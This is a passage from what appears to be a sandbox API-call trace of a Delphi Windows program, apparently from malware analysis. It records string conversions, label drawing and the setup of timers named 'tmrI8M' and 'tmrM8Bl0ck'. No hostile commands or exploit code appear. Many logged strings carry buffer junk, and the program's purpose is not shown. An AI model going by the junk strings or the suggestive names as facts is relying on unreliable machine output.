cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515f0, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x63515f0, cbMultiByte=7, lpWideCharStr=0x634a1f8, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0281.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x635ffc4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0281.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515f0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x63515f0, cbMultiByte=6, lpWideCharStr=0x6351608, cchWideChar=6 | out: lpWideCharStr="Label1\x01") returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=6, lpWideCharStr=0x6351620, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351608, cbMultiByte=6, lpWideCharStr=0x6351620, cchWideChar=6 | out: lpWideCharStr="Label2") returned 6 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a23c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0281.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60c4767, cbMultiByte=6, lpWideCharStr=0x634a23c, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0281.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0281.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f559, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06\x07", lpUsedDefaultChar=0x0) returned 0 [0281.659] GetCurrentThreadId () returned 0x62c [0281.659] GetCurrentThreadId () returned 0x62c [0281.659] GetCurrentThreadId () returned 0x62c [0281.659] GetDC (hWnd=0x0) returned 0xc01016e [0281.659] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.659] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.659] GetSysColor (nIndex=8) returned 0x0 [0281.660] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.660] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.660] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.660] UnrealizeObject (h=0xc100741) returned 1 [0281.660] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.660] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.660] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.660] GetSysColor (nIndex=8) returned 0x0 [0281.660] GetSysColor (nIndex=14) returned 0xffffff [0281.660] DrawThemeTextEx () returned 0x0 [0281.660] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.660] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.660] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.660] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f338 | out: lppt=0x534f338) returned 1 [0281.660] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06", lpUsedDefaultChar=0x0) returned 0 [0281.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label2", cchWideChar=6, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label2", lpUsedDefaultChar=0x0) returned 6 [0281.660] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.660] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351620, cchWideChar=4 | out: lpWideCharStr="Leftl2") returned 4 [0281.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a1fc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leftp", lpUsedDefaultChar=0x0) returned 4 [0281.660] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.660] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351620, cchWideChar=3 | out: lpWideCharStr="Toptl2") returned 3 [0281.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=5, lpWideCharStr=0x6351650, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0281.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x634a1fc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351620, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351620, cbMultiByte=6, lpWideCharStr=0x6351638, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0281.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x6360064, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351620, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351620, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0281.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x6360064, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0281.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6351620, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6351620, cbMultiByte=6, lpWideCharStr=0x6351638, cchWideChar=6 | out: lpWideCharStr="Label2\x01") returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=6, lpWideCharStr=0x6351650, cchWideChar=6 | out: lpWideCharStr="TLabel") returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351638, cbMultiByte=6, lpWideCharStr=0x6351650, cchWideChar=6 | out: lpWideCharStr="Label3") returned 6 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a1fc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.661] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 3 [0281.661] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60c4767, cbMultiByte=6, lpWideCharStr=0x634a1fc, cchWideChar=7 | out: lpWideCharStr="TLabel") returned 6 [0281.661] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TLabel", cchCount1=6, lpString2="TLabel", cchCount2=6) returned 2 [0281.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f559, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06\x07", lpUsedDefaultChar=0x0) returned 0 [0281.662] GetCurrentThreadId () returned 0x62c [0281.662] GetCurrentThreadId () returned 0x62c [0281.662] GetCurrentThreadId () returned 0x62c [0281.662] GetDC (hWnd=0x0) returned 0xc01016e [0281.662] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.662] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.662] GetSysColor (nIndex=8) returned 0x0 [0281.662] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.662] SelectObject (hdc=0xc01016e, h=0x830021e) returned 0x1b00017 [0281.662] SetROP2 (hdc=0xc01016e, rop2=13) returned 13 [0281.662] UnrealizeObject (h=0xc100741) returned 1 [0281.662] SelectObject (hdc=0xc01016e, h=0xc100741) returned 0x1900010 [0281.663] SetBkColor (hdc=0xc01016e, color=0xffffff) returned 0xffffff [0281.663] SetBkMode (hdc=0xc01016e, mode=2) returned 2 [0281.663] GetSysColor (nIndex=8) returned 0x0 [0281.663] GetSysColor (nIndex=14) returned 0xffffff [0281.663] DrawThemeTextEx () returned 0x0 [0281.663] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x830021e [0281.663] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0xc100741 [0281.663] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.663] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534f338 | out: lppt=0x534f338) returned 1 [0281.663] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06", lpUsedDefaultChar=0x0) returned 0 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Label3", cchWideChar=6, lpMultiByteStr=0x534f56d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Label3", lpUsedDefaultChar=0x0) returned 6 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351650, cchWideChar=4 | out: lpWideCharStr="Leftl3") returned 4 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Leftp", lpUsedDefaultChar=0x0) returned 4 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351650, cchWideChar=3 | out: lpWideCharStr="Toptl3") returned 3 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=5, lpWideCharStr=0x6351680, cchWideChar=5 | out: lpWideCharStr="Width") returned 5 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Width", cchWideChar=5, lpMultiByteStr=0x634a29c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Width", lpUsedDefaultChar=0x0) returned 5 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351650, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.663] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351650, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="Height\x01") returned 6 [0281.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Height", cchWideChar=6, lpMultiByteStr=0x6360104, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Height", lpUsedDefaultChar=0x0) returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351650, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351650, cbMultiByte=7, lpWideCharStr=0x634a2d8, cchWideChar=7 | out: lpWideCharStr="Captiont") returned 7 [0281.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Caption", cchWideChar=7, lpMultiByteStr=0x6360104, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Caption", lpUsedDefaultChar=0x0) returned 7 [0281.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6351650, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6351650, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="Label3\x01") returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="tmrI8M") returned 6 [0281.664] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.664] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.664] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.664] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10112 [0281.665] SetWindowLongW (hWnd=0x10112, nIndex=-4, dwNewLong=54661051) returned 100465804 [0281.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrI8M", cchWideChar=6, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrI8M", lpUsedDefaultChar=0x0) returned 6 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x634a298, cchWideChar=8 | out: lpWideCharStr="Interval") returned 8 [0281.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval", lpUsedDefaultChar=0x0) returned 8 [0281.665] KillTimer (hWnd=0x10112, uIDEvent=0x1) returned 0 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a2d8, cchWideChar=7 | out: lpWideCharStr="OnTimeron") returned 7 [0281.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.665] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x6360128, cchWideChar=11 | out: lpWideCharStr="tmrI8MTimer") returned 11 [0281.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrI8MTimer", cchWideChar=11, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrI8MTimer\x0b", lpUsedDefaultChar=0x0) returned 11 [0281.665] KillTimer (hWnd=0x10112, uIDEvent=0x1) returned 0 [0281.665] SetTimer (hWnd=0x10112, nIDEvent=0x1, uElapse=0x5dc, lpTimerFunc=0x0) returned 0x1 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left敭r\x01") returned 4 [0281.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a2dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt敭r\x01") returned 3 [0281.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=10, lpWideCharStr=0x634a298, cchWideChar=10 | out: lpWideCharStr="tmrM8Bl0ck馰ش朐؈") returned 10 [0281.666] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.666] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.666] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.666] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10114 [0281.667] SetWindowLongW (hWnd=0x10114, nIndex=-4, dwNewLong=54661038) returned 100465804 [0281.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8Bl0ck", cchWideChar=10, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8Bl0ck", lpUsedDefaultChar=0x0) returned 10 [0281.667] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.667] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimerr") returned 7 [0281.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.667] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a2d8, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0281.667] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a2d8, cbMultiByte=15, lpWideCharStr=0x6366d88, cchWideChar=15 | out: lpWideCharStr="tmrM8Bl0ckTimer") returned 15 [0281.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8Bl0ckTimer", cchWideChar=15, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8Bl0ckTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0281.667] KillTimer (hWnd=0x10114, uIDEvent=0x1) returned 0 [0281.667] SetTimer (hWnd=0x10114, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: 